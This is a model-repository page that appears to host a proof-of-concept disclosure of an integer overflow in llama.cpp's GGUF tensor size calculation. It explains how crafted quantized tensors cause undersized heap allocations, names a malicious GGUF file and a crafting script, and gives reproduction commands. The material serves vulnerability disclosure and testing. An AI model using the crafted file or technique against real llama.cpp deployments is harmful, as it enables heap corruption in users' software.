You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

PoC: Integer Overflow in ggml_nbytes() for Quantized GGUF Tensors

Vulnerability

Integer overflow in ggml_nbytes() (ggml/src/ggml.c:1273) and ggml_row_size() (ggml/src/ggml.c:1302) causes drastically undersized heap allocations when loading crafted GGUF files with quantized tensor types.

For quantized types (Q4_0 through Q8_K, blck_size > 1), the computation ne[0] * type_size / blck_size overflows in the intermediate ne[0] * type_size multiplication before the division, returning a tiny value (e.g., 4 bytes instead of 576 PB).

All existing overflow checks in the GGUF parser pass because they validate the final result (nelements/blck_size)*type_size, not the intermediate product.

Files

malicious.gguf - Crafted GGUF with Q4_0 tensor, ne[0]=1024819115206086208
craft_gguf.py - Script to generate malicious GGUF files (supports Q4_0 through Q8_K)
test_load.c - Test loader demonstrating the overflow

Reproduction

# Build llama.cpp with ASan
cmake -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" ..
cmake --build . --target llama-gguf

# Run
./bin/llama-gguf malicious.gguf r

Impact

Heap buffer overflow via undersized allocation. Affects llama-quantize, llama-imatrix, control vectors, and examples/gguf (all code paths using no_alloc=false). Variant of CVE-2026-27940/CVE-2026-33298.

Downloads last month: -

GGUF

Model size

1024819.1T params

Architecture

Hardware compatibility

We're not able to determine the quantization variants.

View all variants

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support